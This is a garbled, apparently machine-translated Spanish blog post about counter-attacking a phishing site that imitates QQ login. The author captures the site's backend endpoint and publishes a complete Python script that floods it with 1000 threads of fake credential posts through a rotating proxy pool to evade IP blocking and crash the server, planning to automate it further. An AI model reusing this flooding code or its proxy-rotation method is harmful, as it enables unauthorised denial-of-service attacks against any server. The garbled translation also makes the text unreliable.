Las cosas tienen que empezar con un sitio web que vi en My Love, pon la dirección: http://tencent.outlook.com.eskdp.xyz/mail/
Después de abrir, es una página que imita el inicio de sesión del espacio QQ, y luego ingresa cualquier cosa en el cuadro de contraseña de la cuenta, saltará a la página del buzón QQ (el buzón QQ aquí es de hecho un buzón QQ bajo Tencent), lo que dará una gran cantidad de pequeñas Bai
creó una ilusión: Bueno, debe haber un problema con la familia QQ, y salté al buzón de QQ cuando inicié sesión en el espacio QQ.
Tomemos el paquete, abra las herramientas de desarrollador en esta página (haga clic con el botón derecho del ratón y marque), abra Red, porque habrá un salto más tarde, así que verifique el registro de conservación, luego ingrese una cadena de contraseñas de cuenta y haga clic en iniciar sesión
Luego encontrará que api.php está capturado, la dirección completa es http://tencent.outlook.com.eskdp.xyz/mail/api/api.php
El método de publicación envía dos campos de nombre de usuario y contraseña para
recordar esta dirección, el programa la usará más tarde
Bien, tenemos la dirección de backend real. Pensando en esto, alguien sonrió. Nuestra idea es seguir enviándole solicitudes hasta que su servidor falle (se reiniciará más tarde).
Entonces, se lanzó la primera versión del código. Fue una locura enviar solicitudes de publicación a través de subprocesos múltiples. Después de la prueba, se encontró que había algunos problemas, es decir, este sitio web parece poder bloquear la IP y restringir la IP solicitada. En este caso,
alguien sonrió Con una sonrisa, pensé en el grupo de generación de IP {over} {filter}, así que cloné un proyecto de código abierto de git para inyectar alma en el programa, así que abrí el programa y, después de un minuto, actualicé el sitio web de phishing nuevamente y no se pudo abrir más.
El proyecto de grupo de generación {over} 理 {filter} que utilicé es https://github.com/jhao104/proxy_pool
Encontré un error cuando comencé este proyecto. Si tiene el mismo problema, consulte mi problema: https://github.com/jhao104/proxy_pool/issues/453
Pon el código debajo
#coding=utf-8
'''
疯狂发送post请求
'''
import requests
import random
from time import ctime
import threading
count = 1
def get_proxy():
return requests.get("http://127.0.0.1:5010/get/").json()
def delete_proxy(proxy):
requests.get("http://127.0.0.1:5010/delete/?proxy={}".format(proxy))
def getResponse(postJson):
# ....
retry_count = 5
url = 'http://tencent.outlook.com.eskdp.xyz/mail/api/api.php'
proxy = get_proxy().get("proxy")
while retry_count > 0:
try:
response = requests.post(url, proxies={
"http": "http://{}".format(proxy)}, data=postJson)
# 使用代理访问
return response
except Exception:
retry_count -= 1
# 出错5次, 删除代理池中代理
delete_proxy(proxy)
return None
#创建请求函数
def postRequest():
global count
Number = "0123456789qbcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPWRSTUVWXYZ"
postJson= {
"username":random.randint(10000,9999999999),"password":"".join(random.choice(Number) for i in range(random.randint(6,10)))}#值以字典的形式传入
# response = requests.post(url=url,data=postJson)
response = getResponse(postJson)
# if response is not None
try:
print("状态码:", response.status_code, "第", count, "次发送成功")
count += 1
except :
pass
#创建数组存放线程
threads=[]
#创建1000个线程
for i in range(1000):
#针对函数创建线程
t=threading.Thread(target=postRequest,args=())
#把创建的线程加入线程组
threads.append(t)
if __name__ == '__main__':
#启动线程
for i in threads:
i.start()
#keep thread
for i in threads:
i.join()
En el futuro, lo voy a mejorar agregando detección periódica y luego colocándolo en el servidor, siempre que detecte que la página web se puede abrir, continuará enviando. Para este tipo de sitio web de phishing que pone en peligro la seguridad de la información de todos, debemos trabajar juntos para mantener la seguridad de la red.